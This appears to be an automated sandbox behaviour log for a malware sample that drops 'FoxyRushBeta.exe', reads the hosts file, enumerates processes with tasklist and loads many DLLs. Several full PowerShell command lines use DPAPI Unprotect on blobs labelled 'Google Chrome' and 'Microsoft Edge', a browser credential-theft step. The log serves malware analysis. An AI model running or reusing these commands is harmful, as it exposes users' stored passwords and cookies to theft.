Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile read: C:\Users\user\Desktop\bkHLzNaNMS.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\bkHLzNaNMS.exe "C:\Users\user\Desktop\bkHLzNaNMS.exe"
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: textinputframework.dllJump to behavior
